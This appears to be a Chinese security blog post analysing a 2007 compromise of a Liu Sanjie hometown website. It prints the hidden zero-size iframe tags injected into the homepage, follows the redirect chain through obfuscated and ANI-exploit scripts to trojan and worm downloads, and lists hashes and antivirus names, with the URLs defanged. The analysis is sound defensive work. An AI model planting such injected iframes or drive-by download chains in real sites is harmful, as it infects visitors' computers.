首页 > 其他分享 >刘三姐故乡网站加挂Trojan-PSW.Win32.Delf.qc,Worm.Win32.Agent.uu等

刘三姐故乡网站加挂Trojan-PSW.Win32.Delf.qc,Worm.Win32.Agent.uu等

时间:2022-11-23 18:07:56浏览次数:46  
标签:--- Trojan Delf htm height Win32 iframe src hxxp


endurer 原创
2007-06-12 第1

 原来那个Viking还在,又加了一个Viking,几个 Trojan 和 和 Worm。

网站首页被植入代码:
/---
<iframe name="tt" src="exobud.htm" width="580" height="25" scrolling="Auto" frameborder="0"></iframe>
<iframe src=hxxp://www.m*85*8**53.com.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m*85*8**53.cn/muma/index.htm width=0 height=0></iframe>
<iframe src=hxxp://w*.m*h*88*8**8.cn/ad.htm?a width=100 height=0 frameborder=0></iframe>
<iframe src=hxxp://www.n*85*85**3.cn/index.htm width=0 height=0></iframe>
<iframe src="hxxp://www.cao*n*i***ma.info/888.html" width="0" height="0" frameborder="0"></iframe>
<iframe src=hxxp://www.m*85*8**53.cn/gogo/index.htm width=0 height=0></iframe>
--/

exobud.htm 包含代码:
/---
<iframe src="hxxp://w*.m*h*88*8**8.cn/ad.htm?a" width="100" height="0"></iframe>
<iframe src=hxxp://w*.m*h*88*8**8.cn/ad.htm?a width=100 height=0 frameborder=0></iframe>
---/

hxxp://w*.m*h*88*8**8.cn/ad.htm?a 包含代码:
/---
<iframe src="hxxp://www.5*46**0*w.cn/3721/myhelp.htm" width="50" height="0"> </iframe>
<iframe src="hxxp://w*.m*h*88*8**8.cn/xxx.htm" width="100" height="0"> </iframe>
<iframe src="hxxp://www.5*46**0*w.cn/sky.htm" width="100" height="0"> </iframe>
<iframe src="hxxp://www.5*46**0*w.cn/index.htm" width="100" height="0"> </iframe>
---/

hxxp://www.m*85*8**53.com.cn/index.htm 包含代码:
/---
<iframe src="hxxp://www.p*u**m*a**163.com/pu/8378692.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.m*85*8**53.cn/muma/index.htm 包含代码:
/---
<iframe src=hxxp://www.87**87*72.cn/wm/bms4.htm width=0 height=0></iframe>
---/

hxxp://www.n*85*85**3.cn/index.htm 末包含代码:
/---
<iframe src="hxxp://www.zpx520.com/cs1.htm?id=88394868-6929" width=0 height=0></iframe>
---/

hxxp://www.cao*n*i***ma.info/888.html 包含代码:
/---
<iframe src="hxxp://www.5*5**5*y.net/888.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.5*5**5*y.net/888.htm 包含代码:
/---
<iframe src="hxxp://www.d*eb**a*e.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.5*5**5*y.net/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.q*q*8**81.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.52**00***1*8.com/" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.d*eb**a*e.cn 包含代码:
/---
<iframe src="hxxp://www.pu*m*a*164.com/pu/551903.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.pu*m*a*164.com/pu/551903.htm 包含代码:
/---
<SCRIPT language="Jscript.encode" src=164.js></script>
---/

164.js 内容为eval()执行自定义函数,经3次解密得到原始代码,下载1.exe。

文件说明符 : D:/test/1.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.0.0.0
说明 :
版权 :
备注 :
产品版本 : 1.0.0.0
产品名称 :
公司名称 :
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-21 12:33:55
修改时间 : 2007-6-21 12:33:56
访问时间 : 2007-6-21 0:0:0
大小 : 95232 字节 93.0 KB
MD5 : 24785a0619735bfb63a5b7ffa27c7821

Kaspersky 报为 Worm.Win32.Viking.ls,瑞星报为 Worm.Viking.tl

 

hxxp://www.5*5**5*y.net/ 包含代码:
/---
<iframe src=hxxp://www.b*y**i*p.cn/newdm/new82.htm width=0 height=0></iframe>
---/

hxxp://www.b*y**i*p.cn/newdm/new82.htm 是JavaScript和VBScript混合代码,输出为VBScript代码,功能是下载 hxxp://x*xt**vb*.cn/arp/dd.exe

文件说明符 : D:/test/dd.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-21 12:40:27
修改时间 : 2007-6-21 12:40:28
访问时间 : 2007-6-21 0:0:0
大小 : 36352 字节 35.512 KB
MD5 : 8faba4ed58813539bdf4b2a0c9b1191c

瑞星报为 Trojan.DL.Mnless.ajs

hxxp://www.q*q*8**81.cn/ 包含代码:
/---
<iframe src=hxxp://weather**.n*e**ws.wl**3*21.cn/7/1.htm width=0 height=0></iframe>
---/

hxxp://weather**.n*e**ws.wl**3*21.cn/7/1.htm 包含代码:
/---
<SCRIPT language="Jscript.encode" src=14.js></script>
---/

14.js 内容为eval()执行自定义函数,经2次解密得到原始代码,下载 hxxp://weather**.n*e**ws.wl**3*21.cn/0/x.exe

文件说明符 : D:/pe/tools/virus/x.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-21 12:43:36
修改时间 : 2007-6-21 12:43:38
访问时间 : 2007-6-21 0:0:0
大小 : 51783 字节 50.583 KB
MD5 : 2fb4f30dbc4f74f06e9bf977a0187010

hxxp://www.52**00***1*8.com/ 首部包含代码:
/---
<iframe src="hxxp://www.dz*y**520.com/cs.htm?id=slsxmt" width=0 height=0></iframe>
---/

hxxp://www.dz*y**520.com/cs.htm?id=slsxmt 包含两段恶意代码。
1、US-ASCII编码的字符。到 hxxp://purpleendurer.ys168.com 下载 US-ASCII 编码解码器,解码为:
/---
<HTML>
<BODY style='CURSOR: url(hxxp://q*.z*p**x5*20.com/w.js)'>
</BODY>
</HTML>
---/
hxxp://q*.z*p**x5*20.com/w.js 利用 ANI 漏洞下载 0.exe

文件说明符 : D:/test/0.exe
获取文件版本信息大小失败!
创建时间 : 2007-6-20 12:4:42
修改时间 : 2007-6-20 12:4:44
访问时间 : 2007-6-20 0:0:0
大小 : 22735 字节 22.207 KB
MD5 : 0866f380b3acb7f4f057780360677571

Kaspersky 报为 Trojan-PSW.Win32.Delf.qc

2、代码:
/---
<iframe src="hxxp://q*.z*p**x5*20.com/1.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://q*.z*p**x5*20.com/1.htm 包含US-ASCII编码的字符。解码为JavaScript代码,下载 0.exe。

hxxp://www.m*85*8**53.cn/gogo/index.htm  包含代码:
/---
<iframe src="hxxp://5*5*5.5*5***5y.net/888.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://5*5*5.5*5***5y.net/888.htm 包含代码:
/---
<iframe src="hxxp://www.tr**e*q.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.d*eb**a*e.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://5*5*5.5*5***5y.net/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.q*q*8**81.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.1**25*a*.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.m**qd**l*.com/index.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.5*46**0*w.cn/3721/myhelp.htm 包含代码:
/---
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip2.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip.htm" width="50" height="0" border="0"></iframe>
---/

vip1.htm、vip2.htm 包含 JavaScript代码,下载520.exe。

文件说明符 : D:/pe/tools/virus/520.exe
获取文件版本信息大小失败!
创建时间 : 2007-6-20 12:29:14
修改时间 : 2007-6-20 12:29:16
访问时间 : 2007-6-20 0:0:0
大小 : 22566 字节 22.38 KB
MD5 : 7ee0d5f58c4672da89fb03e3fdf298aa

Kaspersky 报为 Trojan-Spy.Win32.Delf.uh

vip.htm 包含代码:
/---
<DIV style="CURSOR: url(ah.c)"></DIV>
---/
ah.c 利用 ANI漏洞下载 520.exe。

hxxp://w*.m*h*88*8**8.cn/xxx.htm 包含代码:
/---
<iframe src=hxxp://www.c*o*py*i*p.com/ip001_1.htm width=0 height=0></iframe>
---/

hxxp://www.c*o*py*i*p.com/ip001_1.htm 是JavaScript和VBScript混合代码,输出为VBScript代码,下载 do.exe 和 ip001_1.exe。

文件说明符 : D:/test/do.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-21 12:49:20
修改时间 : 2007-6-21 12:49:22
访问时间 : 2007-6-21 0:0:0
大小 : 35840 字节 35.0 KB
MD5 : ea58fec5580718ce3f4a7f8ee89928c3

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bjy,瑞星 报为 Worm.Win32.Agent.uu

文件说明符 : D:/test/ip001_1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-21 12:52:4
修改时间 : 2007-6-21 12:52:6
访问时间 : 2007-6-21 0:0:0
大小 : 41984 字节 41.0 KB
MD5 : e8c9aad9713190fa621a4d729cdb56fd

Kaspersky 报为 Trojan-Downloader.Win32.Banload.awy,瑞星 报为 Trojan.Clicker.Delf.yjd

hxxp://www.5*46**0*w.cn/sky.htm 不存在。

hxxp://www.5*46**0*w.cn/index.htm 包含代码:
/---
<iframe src="hxxp://www.pu*m*a*164.com/pu/709671697.htm?id=56" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.pu*m*a*164.com/pu/709671697.htm?id=56包含代码:
/---
<SCRIPT language="Jscript.encode" src=164.js></script>
---/

164.js 内容为eval()执行自定义函数,经3次解密得到原始代码,下载
hxxp://www.pu*m*a*164.com/pu/1.exe。

hxxp://www.m**qd**l*.com/index.htm 包含代码:
/---
<iframe src="hxxp://bo**olo*m.com/ax.htm?7126?37197" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://bo**olo*m.com/ax.htm?7126?37197 包含代码:
/---
SCRIPT language="Jscript.encode" src=un.js></script>
---/

un.js 内容为eval()执行自定义函数,经3次解密得到原始代码,下载 alexa.exe,
文件名生成函数比较少见:
/---
function HJAakes(slKsm1){var LhzSWS2 = window["Math"]["random"]()*slKsm1;return window["Math"]["round"](LhzSWS2)+'.exe';
}
---/

文件说明符 : D:/pe/tools/virus/alexa.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.0.0.0
说明 :
版权 :
备注 :
产品版本 : 1.0.0.0
产品名称 :
公司名称 :
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-21 13:35:45
修改时间 : 2007-6-21 13:35:46
访问时间 : 2007-6-21 0:0:0
大小 : 95232 字节 93.0 KB
MD5 : 0b75d7947a9ac806318170a2cd45188a

Kaspersky 报为 Worm.Win32.Viking.lm,瑞星 报为 Worm.Viking.tc

标签:---,Trojan,Delf,htm,height,Win32,iframe,src,hxxp
From: https://blog.51cto.com/endurer/5881543

相关文章